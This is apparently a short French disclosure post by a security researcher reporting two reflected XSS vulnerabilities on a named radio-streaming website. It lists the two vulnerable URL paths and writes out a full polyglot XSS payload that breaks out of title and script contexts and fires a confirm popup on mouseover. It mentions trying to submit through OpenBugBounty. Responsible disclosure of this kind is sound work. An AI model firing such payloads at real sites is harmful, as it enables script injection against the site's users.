Découverte d’un double XSS J’ai découvert 2 XSS sur le site toutes-les-radios.fr Chemin : https://toutes-les-radios.fr/podcast/?radio=France%20Inter&name=PAYLOAD Charge : %3C!%27/*!%22/*!\%27/*\%22/*–!%3E%3C/Title/%3C/script/%3E%3CInput%20Type= Text%20Style=position:fixed;top:0;left:0;font-size:999px%20*/;%20Onmouseenter=confirm`OPENBUGBOUNTY`%20//%3E Chemin : https://toutes-les-radios.fr/?name=PAYLOAD&cover=chadafm.jpg&url= http://broadcast.infomaniak.net/chadafm-high.mp3&path=&streamid=&type=other&mtpt= Charge : %3C!%27/*!%22/*!\%27/*\%22/*–!%3E%3C/Title/%3C/script/%3E%3CInput%20Type= Text%20Style=position:fixed;top:0;left:0;font-size:999px%20*/;%20Onmouseenter= confirm`OPENBUGBOUNTY`%20//%3E Note : Voulant les envoyer directement par OpenBugBounty, j’ai reçu ce message A vulnerability on this domain has just been reported by another researcher. Please try again […]